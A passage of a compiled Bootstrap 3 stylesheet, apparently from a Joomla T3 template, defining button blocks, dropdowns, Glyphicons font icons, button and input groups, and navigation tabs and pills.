  width: 100%;
}
.btn-block + .btn-block {
  margin-top: 5px;
}
input[type="submit"].btn-block,
input[type="reset"].btn-block,
input[type="button"].btn-block {
  width: 100%;
}
.dropdown-submenu {
  position: relative;
}
.dropdown-submenu > .dropdown-menu {
  top: 0;
  left: 100%;
  margin-top: -5px;
  margin-left: -1px;
}
.dropdown-submenu.open > .dropdown-menu {
  display: block;
}
.dropdown-submenu > .dropdown-menu {
  border-radius: 0;
}
.dropdown-submenu > a:after {
  display: block;
  content: " ";
  float: right;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
  border-width: 5px 0 5px 5px;
  border-left-color: #111111;
  margin-top: 5px;
  margin-right: -5px;
}
.dropdown-submenu.open > a:after {
  border-left-color: #ffffff;
}

.fade {
  opacity: 0;
  -webkit-transition: opacity 0.15s linear;
  -o-transition: opacity 0.15s linear;
  transition: opacity 0.15s linear;
}
.fade.in {
  opacity: 1;
}
.collapse {
  display: none;
}
.collapse.in {
  display: block;
}
tr.collapse.in {
  display: table-row;
}
tbody.collapse.in {
  display: table-row-group;
}
.collapsing {
  position: relative;
  height: 0;
  overflow: hidden;
  -webkit-transition-property: height, visibility;
  transition-property: height, visibility;
  -webkit-transition-duration: 0.35s;
  transition-duration: 0.35s;
  -webkit-transition-timing-function: ease;
  transition-timing-function: ease;
}
@font-face {
  font-family: "Glyphicons Halflings";
  src: url("../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.eot");
  src: url("../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.eot?#iefix") format("embedded-opentype"), url("../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.woff2") format("woff2"), url("../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.woff") format("woff"), url("../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.ttf") format("truetype"), url("../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.svg#glyphicons_halflingsregular") format("svg");
}
.glyphicon {
  position: relative;
  top: 1px;
  display: inline-block;
  font-family: "Glyphicons Halflings";
  font-style: normal;
  font-weight: 400;
  line-height: 1;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}
.glyphicon-asterisk:before {
  content: "\002a";
}
.glyphicon-plus:before {
  content: "\002b";
}
.glyphicon-euro:before,
.glyphicon-eur:before {
  content: "\20ac";
}
.glyphicon-minus:before {
  content: "\2212";
}
.glyphicon-cloud:before {
  content: "\2601";
}
.glyphicon-envelope:before {
  content: "\2709";
}
.glyphicon-pencil:before {
  content: "\270f";
}
.glyphicon-glass:before {
  content: "\e001";
}
.glyphicon-music:before {
  content: "\e002";
}
.glyphicon-search:before {
  content: "\e003";
}
.glyphicon-heart:before {
  content: "\e005";
}
.glyphicon-star:before {
  content: "\e006";
}
.glyphicon-star-empty:before {
  content: "\e007";
}
.glyphicon-user:before {
  content: "\e008";
}
.glyphicon-film:before {
  content: "\e009";
}
.glyphicon-th-large:before {
  content: "\e010";
}
.glyphicon-th:before {
  content: "\e011";
}
.glyphicon-th-list:before {
  content: "\e012";
}
.glyphicon-ok:before {
  content: "\e013";
}
.glyphicon-remove:before {
  content: "\e014";
}
.glyphicon-zoom-in:before {
  content: "\e015";
}
.glyphicon-zoom-out:before {
  content: "\e016";
}
.glyphicon-off:before {
  content: "\e017";
}
.glyphicon-signal:before {
  content: "\e018";
}
.glyphicon-cog:before {
  content: "\e019";
}
.glyphicon-trash:before {
  content: "\e020";
}
.glyphicon-home:before {
  content: "\e021";
}
.glyphicon-file:before {
  content: "\e022";
}
.glyphicon-time:before {
  content: "\e023";
}
.glyphicon-road:before {
  content: "\e024";
}
.glyphicon-download-alt:before {
  content: "\e025";
}
.glyphicon-download:before {
  content: "\e026";
}
.glyphicon-upload:before {
  content: "\e027";
}
.glyphicon-inbox:before {
  content: "\e028";
}
.glyphicon-play-circle:before {
  content: "\e029";
}
.glyphicon-repeat:before {
  content: "\e030";
}
.glyphicon-refresh:before {
  content: "\e031";
}
.glyphicon-list-alt:before {
  content: "\e032";
}
.glyphicon-lock:before {
  content: "\e033";
}
.glyphicon-flag:before {
  content: "\e034";
}
.glyphicon-headphones:before {
  content: "\e035";
}
.glyphicon-volume-off:before {
  content: "\e036";
}
.glyphicon-volume-down:before {
  content: "\e037";
}
.glyphicon-volume-up:before {
  content: "\e038";
}
.glyphicon-qrcode:before {
  content: "\e039";
}
.glyphicon-barcode:before {
  content: "\e040";
}
.glyphicon-tag:before {
  content: "\e041";
}
.glyphicon-tags:before {
  content: "\e042";
}
.glyphicon-book:before {
  content: "\e043";
}
.glyphicon-bookmark:before {
  content: "\e044";
}
.glyphicon-print:before {
  content: "\e045";
}
.glyphicon-camera:before {
  content: "\e046";
}
.glyphicon-font:before {
  content: "\e047";
}
.glyphicon-bold:before {
  content: "\e048";
}
.glyphicon-italic:before {
  content: "\e049";
}
.glyphicon-text-height:before {
  content: "\e050";
}
.glyphicon-text-width:before {
  content: "\e051";
}
.glyphicon-align-left:before {
  content: "\e052";
}
.glyphicon-align-center:before {
  content: "\e053";
}
.glyphicon-align-right:before {
  content: "\e054";
}
.glyphicon-align-justify:before {
  content: "\e055";
}
.glyphicon-list:before {
  content: "\e056";
}
.glyphicon-indent-left:before {
  content: "\e057";
}
.glyphicon-indent-right:before {
  content: "\e058";
}
.glyphicon-facetime-video:before {
  content: "\e059";
}
.glyphicon-picture:before {
  content: "\e060";
}
.glyphicon-map-marker:before {
  content: "\e062";
}
.glyphicon-adjust:before {
  content: "\e063";
}
.glyphicon-tint:before {
  content: "\e064";
}
.glyphicon-edit:before {
  content: "\e065";
}
.glyphicon-share:before {
  content: "\e066";
}
.glyphicon-check:before {
  content: "\e067";
}
.glyphicon-move:before {
  content: "\e068";
}
.glyphicon-step-backward:before {
  content: "\e069";
}
.glyphicon-fast-backward:before {
  content: "\e070";
}
.glyphicon-backward:before {
  content: "\e071";
}
.glyphicon-play:before {
  content: "\e072";
}
.glyphicon-pause:before {
  content: "\e073";
}
.glyphicon-stop:before {
  content: "\e074";
}
.glyphicon-forward:before {
  content: "\e075";
}
.glyphicon-fast-forward:before {
  content: "\e076";
}
.glyphicon-step-forward:before {
  content: "\e077";
}
.glyphicon-eject:before {
  content: "\e078";
}
.glyphicon-chevron-left:before {
  content: "\e079";
}
.glyphicon-chevron-right:before {
  content: "\e080";
}
.glyphicon-plus-sign:before {
  content: "\e081";
}
.glyphicon-minus-sign:before {
  content: "\e082";
}
.glyphicon-remove-sign:before {
  content: "\e083";
}
.glyphicon-ok-sign:before {
  content: "\e084";
}
.glyphicon-question-sign:before {
  content: "\e085";
}
.glyphicon-info-sign:before {
  content: "\e086";
}
.glyphicon-screenshot:before {
  content: "\e087";
}
.glyphicon-remove-circle:before {
  content: "\e088";
}
.glyphicon-ok-circle:before {
  content: "\e089";
}
.glyphicon-ban-circle:before {
  content: "\e090";
}
.glyphicon-arrow-left:before {
  content: "\e091";
}
.glyphicon-arrow-right:before {
  content: "\e092";
}
.glyphicon-arrow-up:before {
  content: "\e093";
}
.glyphicon-arrow-down:before {
  content: "\e094";
}
.glyphicon-share-alt:before {
  content: "\e095";
}
.glyphicon-resize-full:before {
  content: "\e096";
}
.glyphicon-resize-small:before {
  content: "\e097";
}
.glyphicon-exclamation-sign:before {
  content: "\e101";
}
.glyphicon-gift:before {
  content: "\e102";
}
.glyphicon-leaf:before {
  content: "\e103";
}
.glyphicon-fire:before {
  content: "\e104";
}
.glyphicon-eye-open:before {
  content: "\e105";
}
.glyphicon-eye-close:before {
  content: "\e106";
}
.glyphicon-warning-sign:before {
  content: "\e107";
}
.glyphicon-plane:before {
  content: "\e108";
}
.glyphicon-calendar:before {
  content: "\e109";
}
.glyphicon-random:before {
  content: "\e110";
}
.glyphicon-comment:before {
  content: "\e111";
}
.glyphicon-magnet:before {
  content: "\e112";
}
.glyphicon-chevron-up:before {
  content: "\e113";
}
.glyphicon-chevron-down:before {
  content: "\e114";
}
.glyphicon-retweet:before {
  content: "\e115";
}
.glyphicon-shopping-cart:before {
  content: "\e116";
}
.glyphicon-folder-close:before {
  content: "\e117";
}
.glyphicon-folder-open:before {
  content: "\e118";
}
.glyphicon-resize-vertical:before {
  content: "\e119";
}
.glyphicon-resize-horizontal:before {
  content: "\e120";
}
.glyphicon-hdd:before {
  content: "\e121";
}
.glyphicon-bullhorn:before {
  content: "\e122";
}
.glyphicon-bell:before {
  content: "\e123";
}
.glyphicon-certificate:before {
  content: "\e124";
}
.glyphicon-thumbs-up:before {
  content: "\e125";
}
.glyphicon-thumbs-down:before {
  content: "\e126";
}
.glyphicon-hand-right:before {
  content: "\e127";
}
.glyphicon-hand-left:before {
  content: "\e128";
}
.glyphicon-hand-up:before {
  content: "\e129";
}
.glyphicon-hand-down:before {
  content: "\e130";
}
.glyphicon-circle-arrow-right:before {
  content: "\e131";
}
.glyphicon-circle-arrow-left:before {
  content: "\e132";
}
.glyphicon-circle-arrow-up:before {
  content: "\e133";
}
.glyphicon-circle-arrow-down:before {
  content: "\e134";
}
.glyphicon-globe:before {
  content: "\e135";
}
.glyphicon-wrench:before {
  content: "\e136";
}
.glyphicon-tasks:before {
  content: "\e137";
}
.glyphicon-filter:before {
  content: "\e138";
}
.glyphicon-briefcase:before {
  content: "\e139";
}
.glyphicon-fullscreen:before {
  content: "\e140";
}
.glyphicon-dashboard:before {
  content: "\e141";
}
.glyphicon-paperclip:before {
  content: "\e142";
}
.glyphicon-heart-empty:before {
  content: "\e143";
}
.glyphicon-link:before {
  content: "\e144";
}
.glyphicon-phone:before {
  content: "\e145";
}
.glyphicon-pushpin:before {
  content: "\e146";
}
.glyphicon-usd:before {
  content: "\e148";
}
.glyphicon-gbp:before {
  content: "\e149";
}
.glyphicon-sort:before {
  content: "\e150";
}
.glyphicon-sort-by-alphabet:before {
  content: "\e151";
}
.glyphicon-sort-by-alphabet-alt:before {
  content: "\e152";
}
.glyphicon-sort-by-order:before {
  content: "\e153";
}
.glyphicon-sort-by-order-alt:before {
  content: "\e154";
}
.glyphicon-sort-by-attributes:before {
  content: "\e155";
}
.glyphicon-sort-by-attributes-alt:before {
  content: "\e156";
}
.glyphicon-unchecked:before {
  content: "\e157";
}
.glyphicon-expand:before {
  content: "\e158";
}
.glyphicon-collapse-down:before {
  content: "\e159";
}
.glyphicon-collapse-up:before {
  content: "\e160";
}
.glyphicon-log-in:before {
  content: "\e161";
}
.glyphicon-flash:before {
  content: "\e162";
}
.glyphicon-log-out:before {
  content: "\e163";
}
.glyphicon-new-window:before {
  content: "\e164";
}
.glyphicon-record:before {
  content: "\e165";
}
.glyphicon-save:before {
  content: "\e166";
}
.glyphicon-open:before {
  content: "\e167";
}
.glyphicon-saved:before {
  content: "\e168";
}
.glyphicon-import:before {
  content: "\e169";
}
.glyphicon-export:before {
  content: "\e170";
}
.glyphicon-send:before {
  content: "\e171";
}
.glyphicon-floppy-disk:before {
  content: "\e172";
}
.glyphicon-floppy-saved:before {
  content: "\e173";
}
.glyphicon-floppy-remove:before {
  content: "\e174";
}
.glyphicon-floppy-save:before {
  content: "\e175";
}
.glyphicon-floppy-open:before {
  content: "\e176";
}
.glyphicon-credit-card:before {
  content: "\e177";
}
.glyphicon-transfer:before {
  content: "\e178";
}
.glyphicon-cutlery:before {
  content: "\e179";
}
.glyphicon-header:before {
  content: "\e180";
}
.glyphicon-compressed:before {
  content: "\e181";
}
.glyphicon-earphone:before {
  content: "\e182";
}
.glyphicon-phone-alt:before {
  content: "\e183";
}
.glyphicon-tower:before {
  content: "\e184";
}
.glyphicon-stats:before {
  content: "\e185";
}
.glyphicon-sd-video:before {
  content: "\e186";
}
.glyphicon-hd-video:before {
  content: "\e187";
}
.glyphicon-subtitles:before {
  content: "\e188";
}
.glyphicon-sound-stereo:before {
  content: "\e189";
}
.glyphicon-sound-dolby:before {
  content: "\e190";
}
.glyphicon-sound-5-1:before {
  content: "\e191";
}
.glyphicon-sound-6-1:before {
  content: "\e192";
}
.glyphicon-sound-7-1:before {
  content: "\e193";
}
.glyphicon-copyright-mark:before {
  content: "\e194";
}
.glyphicon-registration-mark:before {
  content: "\e195";
}
.glyphicon-cloud-download:before {
  content: "\e197";
}
.glyphicon-cloud-upload:before {
  content: "\e198";
}
.glyphicon-tree-conifer:before {
  content: "\e199";
}
.glyphicon-tree-deciduous:before {
  content: "\e200";
}
.glyphicon-cd:before {
  content: "\e201";
}
.glyphicon-save-file:before {
  content: "\e202";
}
.glyphicon-open-file:before {
  content: "\e203";
}
.glyphicon-level-up:before {
  content: "\e204";
}
.glyphicon-copy:before {
  content: "\e205";
}
.glyphicon-paste:before {
  content: "\e206";
}
.glyphicon-alert:before {
  content: "\e209";
}
.glyphicon-equalizer:before {
  content: "\e210";
}
.glyphicon-king:before {
  content: "\e211";
}
.glyphicon-queen:before {
  content: "\e212";
}
.glyphicon-pawn:before {
  content: "\e213";
}
.glyphicon-bishop:before {
  content: "\e214";
}
.glyphicon-knight:before {
  content: "\e215";
}
.glyphicon-baby-formula:before {
  content: "\e216";
}
.glyphicon-tent:before {
  content: "\26fa";
}
.glyphicon-blackboard:before {
  content: "\e218";
}
.glyphicon-bed:before {
  content: "\e219";
}
.glyphicon-apple:before {
  content: "\f8ff";
}
.glyphicon-erase:before {
  content: "\e221";
}
.glyphicon-hourglass:before {
  content: "\231b";
}
.glyphicon-lamp:before {
  content: "\e223";
}
.glyphicon-duplicate:before {
  content: "\e224";
}
.glyphicon-piggy-bank:before {
  content: "\e225";
}
.glyphicon-scissors:before {
  content: "\e226";
}
.glyphicon-bitcoin:before {
  content: "\e227";
}
.glyphicon-btc:before {
  content: "\e227";
}
.glyphicon-xbt:before {
  content: "\e227";
}
.glyphicon-yen:before {
  content: "\00a5";
}
.glyphicon-jpy:before {
  content: "\00a5";
}
.glyphicon-ruble:before {
  content: "\20bd";
}
.glyphicon-rub:before {
  content: "\20bd";
}
.glyphicon-scale:before {
  content: "\e230";
}
.glyphicon-ice-lolly:before {
  content: "\e231";
}
.glyphicon-ice-lolly-tasted:before {
  content: "\e232";
}
.glyphicon-education:before {
  content: "\e233";
}
.glyphicon-option-horizontal:before {
  content: "\e234";
}
.glyphicon-option-vertical:before {
  content: "\e235";
}
.glyphicon-menu-hamburger:before {
  content: "\e236";
}
.glyphicon-modal-window:before {
  content: "\e237";
}
.glyphicon-oil:before {
  content: "\e238";
}
.glyphicon-grain:before {
  content: "\e239";
}
.glyphicon-sunglasses:before {
  content: "\e240";
}
.glyphicon-text-size:before {
  content: "\e241";
}
.glyphicon-text-color:before {
  content: "\e242";
}
.glyphicon-text-background:before {
  content: "\e243";
}
.glyphicon-object-align-top:before {
  content: "\e244";
}
.glyphicon-object-align-bottom:before {
  content: "\e245";
}
.glyphicon-object-align-horizontal:before {
  content: "\e246";
}
.glyphicon-object-align-left:before {
  content: "\e247";
}
.glyphicon-object-align-vertical:before {
  content: "\e248";
}
.glyphicon-object-align-right:before {
  content: "\e249";
}
.glyphicon-triangle-right:before {
  content: "\e250";
}
.glyphicon-triangle-left:before {
  content: "\e251";
}
.glyphicon-triangle-bottom:before {
  content: "\e252";
}
.glyphicon-triangle-top:before {
  content: "\e253";
}
.glyphicon-console:before {
  content: "\e254";
}
.glyphicon-superscript:before {
  content: "\e255";
}
.glyphicon-subscript:before {
  content: "\e256";
}
.glyphicon-menu-left:before {
  content: "\e257";
}
.glyphicon-menu-right:before {
  content: "\e258";
}
.glyphicon-menu-down:before {
  content: "\e259";
}
.glyphicon-menu-up:before {
  content: "\e260";
}
.caret {
  display: inline-block;
  width: 0;
  height: 0;
  margin-left: 2px;
  vertical-align: middle;
  border-top: 4px dashed;
  border-top: 4px solid \9;
  border-right: 4px solid transparent;
  border-left: 4px solid transparent;
}
.dropup,
.dropdown {
  position: relative;
}
.dropdown-toggle:focus {
  outline: 0;
}
.dropdown-menu {
  position: absolute;
  top: 100%;
  left: 0;
  z-index: 1000;
  display: none;
  float: left;
  min-width: 160px;
  padding: 5px 0;
  margin: 2px 0 0;
  font-size: 14px;
  text-align: left;
  list-style: none;
  background-color: #444444;
  background-clip: padding-box;
  border: 1px solid #444444;
  border-radius: 0;
  -webkit-box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
  box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
}
.dropdown-menu.pull-right {
  right: 0;
  left: auto;
}
.dropdown-menu .divider {
  height: 1px;
  margin: 9px 0;
  overflow: hidden;
  background-color: #515151;
}
.dropdown-menu > li > a {
  display: block;
  padding: 3px 20px;
  clear: both;
  font-weight: 400;
  line-height: 1.42857143;
  color: #999999;
  white-space: nowrap;
}
.dropdown-menu > li > a:hover,
.dropdown-menu > li > a:focus {
  color: #ffffff;
  text-decoration: none;
  background-color: #515151;
}
.dropdown-menu > .active > a,
.dropdown-menu > .active > a:hover,
.dropdown-menu > .active > a:focus {
  color: #ffffff;
  text-decoration: none;
  background-color: #373737;
  outline: 0;
}
.dropdown-menu > .disabled > a,
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
  color: #999999;
}
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
  text-decoration: none;
  cursor: not-allowed;
  background-color: transparent;
  background-image: none;
  filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
}
.open > .dropdown-menu {
  display: block;
}
.open > a {
  outline: 0;
}
.dropdown-menu-right {
  right: 0;
  left: auto;
}
.dropdown-menu-left {
  right: auto;
  left: 0;
}
.dropdown-header {
  display: block;
  padding: 3px 20px;
  font-size: 12px;
  line-height: 1.42857143;
  color: #999999;
  white-space: nowrap;
}
.dropdown-backdrop {
  position: fixed;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 990;
}
.pull-right > .dropdown-menu {
  right: 0;
  left: auto;
}
.dropup .caret,
.navbar-fixed-bottom .dropdown .caret {
  content: "";
  border-top: 0;
  border-bottom: 4px dashed;
  border-bottom: 4px solid \9;
}
.dropup .dropdown-menu,
.navbar-fixed-bottom .dropdown .dropdown-menu {
  top: auto;
  bottom: 100%;
  margin-bottom: 2px;
}
@media (min-width: 991px) {
  .navbar-right .dropdown-menu {
    right: 0;
    left: auto;
  }
  .navbar-right .dropdown-menu-left {
    right: auto;
    left: 0;
  }
}
.btn-group,
.btn-group-vertical {
  position: relative;
  display: inline-block;
  vertical-align: middle;
}
.btn-group > .btn,
.btn-group-vertical > .btn {
  position: relative;
  float: left;
}
.btn-group > .btn:hover,
.btn-group-vertical > .btn:hover,
.btn-group > .btn:focus,
.btn-group-vertical > .btn:focus,
.btn-group > .btn:active,
.btn-group-vertical > .btn:active,
.btn-group > .btn.active,
.btn-group-vertical > .btn.active {
  z-index: 2;
}
.btn-group .btn + .btn,
.btn-group .btn + .btn-group,
.btn-group .btn-group + .btn,
.btn-group .btn-group + .btn-group {
  margin-left: -1px;
}
.btn-toolbar {
  margin-left: -5px;
}
.btn-toolbar .btn,
.btn-toolbar .btn-group,
.btn-toolbar .input-group {
  float: left;
}
.btn-toolbar > .btn,
.btn-toolbar > .btn-group,
.btn-toolbar > .input-group {
  margin-left: 5px;
}
.btn-group > .btn:not(:first-child):not(:last-child):not(.dropdown-toggle) {
  border-radius: 0;
}
.btn-group > .btn:first-child {
  margin-left: 0;
}
.btn-group > .btn:first-child:not(:last-child):not(.dropdown-toggle) {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.btn-group > .btn:last-child:not(:first-child),
.btn-group > .dropdown-toggle:not(:first-child) {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group > .btn-group {
  float: left;
}
.btn-group > .btn-group:not(:first-child):not(:last-child) > .btn {
  border-radius: 0;
}
.btn-group > .btn-group:first-child:not(:last-child) > .btn:last-child,
.btn-group > .btn-group:first-child:not(:last-child) > .dropdown-toggle {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.btn-group > .btn-group:last-child:not(:first-child) > .btn:first-child {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group .dropdown-toggle:active,
.btn-group.open .dropdown-toggle {
  outline: 0;
}
.btn-group > .btn + .dropdown-toggle {
  padding-right: 8px;
  padding-left: 8px;
}
.btn-group > .btn-lg + .dropdown-toggle {
  padding-right: 12px;
  padding-left: 12px;
}
.btn-group.open .dropdown-toggle {
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.btn-group.open .dropdown-toggle.btn-link {
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn .caret {
  margin-left: 0;
}
.btn-lg .caret {
  border-width: 5px 5px 0;
  border-bottom-width: 0;
}
.dropup .btn-lg .caret {
  border-width: 0 5px 5px;
}
.btn-group-vertical > .btn,
.btn-group-vertical > .btn-group,
.btn-group-vertical > .btn-group > .btn {
  display: block;
  float: none;
  width: 100%;
  max-width: 100%;
}
.btn-group-vertical > .btn-group > .btn {
  float: none;
}
.btn-group-vertical > .btn + .btn,
.btn-group-vertical > .btn + .btn-group,
.btn-group-vertical > .btn-group + .btn,
.btn-group-vertical > .btn-group + .btn-group {
  margin-top: -1px;
  margin-left: 0;
}
.btn-group-vertical > .btn:not(:first-child):not(:last-child) {
  border-radius: 0;
}
.btn-group-vertical > .btn:first-child:not(:last-child) {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group-vertical > .btn:last-child:not(:first-child) {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group-vertical > .btn-group:not(:first-child):not(:last-child) > .btn {
  border-radius: 0;
}
.btn-group-vertical > .btn-group:first-child:not(:last-child) > .btn:last-child,
.btn-group-vertical > .btn-group:first-child:not(:last-child) > .dropdown-toggle {
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group-vertical > .btn-group:last-child:not(:first-child) > .btn:first-child {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
.btn-group-justified {
  display: table;
  width: 100%;
  table-layout: fixed;
  border-collapse: separate;
}
.btn-group-justified > .btn,
.btn-group-justified > .btn-group {
  display: table-cell;
  float: none;
  width: 1%;
}
.btn-group-justified > .btn-group .btn {
  width: 100%;
}
.btn-group-justified > .btn-group .dropdown-menu {
  left: auto;
}
[data-toggle="buttons"] > .btn input[type="radio"],
[data-toggle="buttons"] > .btn-group > .btn input[type="radio"],
[data-toggle="buttons"] > .btn input[type="checkbox"],
[data-toggle="buttons"] > .btn-group > .btn input[type="checkbox"] {
  position: absolute;
  clip: rect(0, 0, 0, 0);
  pointer-events: none;
}
.input-group {
  position: relative;
  display: table;
  border-collapse: separate;
}
.input-group[class*="col-"] {
  float: none;
  padding-right: 0;
  padding-left: 0;
}
.input-group .form-control {
  position: relative;
  z-index: 2;
  float: left;
  width: 100%;
  margin-bottom: 0;
}
.input-group .form-control:focus {
  z-index: 3;
}
.input-group-lg > .form-control,
.input-group-lg > .input-group-addon,
.input-group-lg > .input-group-btn > .btn {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
select.input-group-lg > .form-control,
select.input-group-lg > .input-group-addon,
select.input-group-lg > .input-group-btn > .btn {
  height: 45px;
  line-height: 45px;
}
textarea.input-group-lg > .form-control,
textarea.input-group-lg > .input-group-addon,
textarea.input-group-lg > .input-group-btn > .btn,
select[multiple].input-group-lg > .form-control,
select[multiple].input-group-lg > .input-group-addon,
select[multiple].input-group-lg > .input-group-btn > .btn {
  height: auto;
}
.input-group-sm > .form-control,
.input-group-sm > .input-group-addon,
.input-group-sm > .input-group-btn > .btn {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
select.input-group-sm > .form-control,
select.input-group-sm > .input-group-addon,
select.input-group-sm > .input-group-btn > .btn {
  height: 30px;
  line-height: 30px;
}
textarea.input-group-sm > .form-control,
textarea.input-group-sm > .input-group-addon,
textarea.input-group-sm > .input-group-btn > .btn,
select[multiple].input-group-sm > .form-control,
select[multiple].input-group-sm > .input-group-addon,
select[multiple].input-group-sm > .input-group-btn > .btn {
  height: auto;
}
.input-group-addon,
.input-group-btn,
.input-group .form-control {
  display: table-cell;
}
.input-group-addon:not(:first-child):not(:last-child),
.input-group-btn:not(:first-child):not(:last-child),
.input-group .form-control:not(:first-child):not(:last-child) {
  border-radius: 0;
}
.input-group-addon,
.input-group-btn {
  width: 1%;
  white-space: nowrap;
  vertical-align: middle;
}
.input-group-addon {
  padding: 6px 12px;
  font-size: 14px;
  font-weight: 400;
  line-height: 1;
  color: #666666;
  text-align: center;
  background-color: #eeeeee;
  border: 1px solid #cccccc;
  border-radius: 0;
}
.input-group-addon.input-sm {
  padding: 5px 10px;
  font-size: 12px;
  border-radius: 0;
}
.input-group-addon.input-lg {
  padding: 10px 16px;
  font-size: 18px;
  border-radius: 0;
}
.input-group-addon input[type="radio"],
.input-group-addon input[type="checkbox"] {
  margin-top: 0;
}
.input-group .form-control:first-child,
.input-group-addon:first-child,
.input-group-btn:first-child > .btn,
.input-group-btn:first-child > .btn-group > .btn,
.input-group-btn:first-child > .dropdown-toggle,
.input-group-btn:last-child > .btn:not(:last-child):not(.dropdown-toggle),
.input-group-btn:last-child > .btn-group:not(:last-child) > .btn {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.input-group-addon:first-child {
  border-right: 0;
}
.input-group .form-control:last-child,
.input-group-addon:last-child,
.input-group-btn:last-child > .btn,
.input-group-btn:last-child > .btn-group > .btn,
.input-group-btn:last-child > .dropdown-toggle,
.input-group-btn:first-child > .btn:not(:first-child),
.input-group-btn:first-child > .btn-group:not(:first-child) > .btn {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.input-group-addon:last-child {
  border-left: 0;
}
.input-group-btn {
  position: relative;
  font-size: 0;
  white-space: nowrap;
}
.input-group-btn > .btn {
  position: relative;
}
.input-group-btn > .btn + .btn {
  margin-left: -1px;
}
.input-group-btn > .btn:hover,
.input-group-btn > .btn:focus,
.input-group-btn > .btn:active {
  z-index: 2;
}
.input-group-btn:first-child > .btn,
.input-group-btn:first-child > .btn-group {
  margin-right: -1px;
}
.input-group-btn:last-child > .btn,
.input-group-btn:last-child > .btn-group {
  z-index: 2;
  margin-left: -1px;
}
.nav {
  padding-left: 0;
  margin-bottom: 0;
  list-style: none;
}
.nav > li {
  position: relative;
  display: block;
}
.nav > li > a {
  position: relative;
  display: block;
  padding: 10px 15px;
}
.nav > li > a:hover,
.nav > li > a:focus {
  text-decoration: none;
  background-color: #eeeeee;
}
.nav > li.disabled > a {
  color: #999999;
}
.nav > li.disabled > a:hover,
.nav > li.disabled > a:focus {
  color: #999999;
  text-decoration: none;
  cursor: not-allowed;
  background-color: transparent;
}
.nav .open > a,
.nav .open > a:hover,
.nav .open > a:focus {
  background-color: #eeeeee;
  border-color: #ff8800;
}
.nav .nav-divider {
  height: 1px;
  margin: 9px 0;
  overflow: hidden;
  background-color: #e5e5e5;
}
.nav > li > a > img {
  max-width: none;
}
.nav-tabs {
  border-bottom: 1px solid #dddddd;
}
.nav-tabs > li {
  float: left;
  margin-bottom: -1px;
}
.nav-tabs > li > a {
  margin-right: 2px;
  line-height: 1.42857143;
  border: 1px solid transparent;
  border-radius: 0 0 0 0;
}
.nav-tabs > li > a:hover {
  border-color: #eeeeee #eeeeee #dddddd;
}
.nav-tabs > li.active > a,
.nav-tabs > li.active > a:hover,
.nav-tabs > li.active > a:focus {
  color: #666666;
  cursor: default;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-bottom-color: transparent;
}
.nav-tabs.nav-justified {
  width: 100%;
  border-bottom: 0;
}
.nav-tabs.nav-justified > li {
  float: none;
}
.nav-tabs.nav-justified > li > a {
  margin-bottom: 5px;
  text-align: center;
}
.nav-tabs.nav-justified > .dropdown .dropdown-menu {
  top: auto;
  left: auto;
}
@media (min-width: 768px) {
  .nav-tabs.nav-justified > li {
    display: table-cell;
    width: 1%;
  }
  .nav-tabs.nav-justified > li > a {
    margin-bottom: 0;
  }
}
.nav-tabs.nav-justified > li > a {
  margin-right: 0;
  border-radius: 0;
}
.nav-tabs.nav-justified > .active > a,
.nav-tabs.nav-justified > .active > a:hover,
.nav-tabs.nav-justified > .active > a:focus {
  border: 1px solid #dddddd;
}
@media (min-width: 768px) {
  .nav-tabs.nav-justified > li > a {
    border-bottom: 1px solid #dddddd;
    border-radius: 0 0 0 0;
  }
  .nav-tabs.nav-justified > .active > a,
  .nav-tabs.nav-justified > .active > a:hover,
  .nav-tabs.nav-justified > .active > a:focus {
    border-bottom-color: #ffffff;
  }
}
.nav-pills > li {
  float: left;
}
.nav-pills > li > a {
  border-radius: 0;
}
.nav-pills > li + li {
  margin-left: 2px;
}
.nav-pills > li.active > a,
.nav-pills > li.active > a:hover,
.nav-pills > li.active > a:focus {
  color: #ffffff;
  background-color: #ff8800;
}
.nav-stacked > li {
  float: none;
}
.nav-stacked > li + li {
  margin-top: 2px;
  margin-left: 0;
}
.nav-justified {
  width: 100%;
}
.nav-justified > li {
  float: none;
}
.nav-justified > li > a {
  margin-bottom: 5px;
  text-align: center;
}
.nav-justified > .dropdown .dropdown-menu {
  top: auto;
  left: auto;
}
@media (min-width: 768px) {
  .nav-justified > li {
    display: table-cell;
    width: 1%;
  }
  .nav-justified > li > a {
    margin-bottom: 0;
  }
}
.nav-tabs-justified {
  border-bottom: 0;
}
